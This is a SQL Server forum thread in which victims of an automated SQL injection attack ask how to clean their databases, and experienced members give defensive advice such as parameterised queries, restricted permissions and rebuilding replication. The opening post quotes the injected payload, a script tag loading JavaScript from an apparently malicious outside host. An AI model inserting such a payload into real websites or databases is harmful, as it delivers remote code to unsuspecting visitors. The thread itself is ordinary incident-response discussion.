SQL Clone
SQLServerCentral is supported by Redgate
 
Log in  ::  Register  ::  Not logged in
 
 
 


injection attack


injection attack

Author
Message
saeed_edp
saeed_edp
Forum Newbie
Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)

Group: General Forum Members
Points: 5 Visits: 96
Pleas help me!
I'm under injection attack and i don't no what can i do.
This script ' script src=http://www.hdadwcd.com/b.js /script' is injected to may database (sql server 2000).
It not only injected in many of databases field but also renamed my publication name to :
" publication name script src=http://www.hdadwcd.com/b.js /script "
How can i repair it and stop this injection
How can I edit binary fields in MSrepl_commands and delete this script from command field.
GilaMonster
GilaMonster
SSC Guru
SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)

Group: General Forum Members
Points: 86663 Visits: 45254
You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database)

There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly acces the tables but to use stored procs.

I would suggest that you drop the publication in question and recreate it.

Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass


bitbucket-25253
bitbucket-25253
SSCertifiable
SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)SSCertifiable (7.8K reputation)

Group: General Forum Members
Points: 7787 Visits: 25280
When reading this. Scroll up to the top of this page in the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentral

If everything seems to be going well, you have obviously overlooked something.

Ron

Please help us, help you -before posting a question please read

Before posting a performance problem please read
saeed_edp
saeed_edp
Forum Newbie
Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)Forum Newbie (5 reputation)

Group: General Forum Members
Points: 5 Visits: 96
Hi
Thank you for your last reply.
I resolved that problem by editing all tables and removing that script.
I think it was a new injection method.
This link was helpful:
http://www.msblog.org/index.php?s=yp
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

But I couldn’t resolve a part of problem:
There were many Binary fields in MSrepl_commands containing bad script.
I deleted them because I couldn’t edit them.
I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?”
Yours truly
saeed.
GilaMonster
GilaMonster
SSC Guru
SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)

Group: General Forum Members
Points: 86663 Visits: 45254
The safest fix is probably to completely drop the replication and recreate it.

Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass


britinusa
britinusa
Grasshopper
Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)

Group: General Forum Members
Points: 24 Visits: 37
Wow, this is an old thread but still very pertinent.

We are rapidly migrating to SQL 2005.

But we were attacked by injection ... every vharchar field in every table replaced with similar .js crap. We restored and the world was good.

But we're trying to find the vulnerability ... of the publically visible pages on the site, (only 5 or 6) all are derived with stored procs and / or our own in house brewed trap.

We are told that SQL2005 and SQL2008 handle SQL injections far better.

We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?

I'm babbling ... but beyond stored procs and home grown filters, are there any other known hardware sotweare remedies.

You refer to a profiler to see commands ... where is that?
GilaMonster
GilaMonster
SSC Guru
SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)

Group: General Forum Members
Points: 86663 Visits: 45254
Can you post this in a new thread please?

Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass


britinusa
britinusa
Grasshopper
Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)

Group: General Forum Members
Points: 24 Visits: 37
Sorry .. by all means .. I'm new here ... my bad.

A new thread or somewhere you'd prefer?

Robert
GilaMonster
GilaMonster
SSC Guru
SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)SSC Guru (86K reputation)

Group: General Forum Members
Points: 86663 Visits: 45254
New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.

Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass


britinusa
britinusa
Grasshopper
Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)Grasshopper (24 reputation)

Group: General Forum Members
Points: 24 Visits: 37
Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?
We are trying to determine the vulnerability?
Go


Permissions

You can't post new topics.
You can't post topic replies.
You can't post new polls.
You can't post replies to polls.
You can't edit your own topics.
You can't delete your own topics.
You can't edit other topics.
You can't delete other topics.
You can't edit your own posts.
You can't edit other posts.
You can't delete your own posts.
You can't delete other posts.
You can't post events.
You can't edit your own events.
You can't edit other events.
You can't delete your own events.
You can't delete other events.
You can't send private messages.
You can't send emails.
You can read topics.
You can't vote in polls.
You can't upload attachments.
You can download attachments.
You can't post HTML code.
You can't edit HTML code.
You can't post IFCode.
You can't post JavaScript.
You can post emoticons.
You can't post or upload images.

Select a forum

































































































































































SQLServerCentral


Search